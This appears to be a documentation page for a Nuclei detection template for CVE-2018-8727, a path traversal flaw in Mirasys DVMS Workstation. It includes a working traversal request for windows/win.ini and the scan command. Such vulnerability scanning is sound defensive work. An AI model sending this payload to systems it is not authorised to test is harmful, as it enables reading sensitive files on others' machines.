Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion
ID: CVE-2018-8727
Severity: high
Author: 0x_akoko
Tags: cve,cve2018,mirasys,lfi,packetstorm
Description
Section titled “Description”Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.
YAML Source
Section titled “YAML Source”id: CVE-2018-8727
info: name: Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion author: 0x_akoko severity: high description: | Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities. impact: | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Upgrade to a patched version of Mirasys DVMS Workstation (>=5.12.7) to mitigate the LFI vulnerability. reference: - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html - https://www.onvio.nl/nieuws/cve-mirasys-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2018-8727 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.01105 epss-percentile: 0.84452 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mirasys product: dvms_workstation tags: cve,cve2018,mirasys,lfi,packetstorm
http: - method: GET path: - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 490a0046304402202946d829f84683923c4a4e6d95e2920c7b465971d9397b8600de01639581d62202203a890b621331b80c1d684bbd07a5909144da514bf9fc80f322698d401c41b89b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-8727.yaml"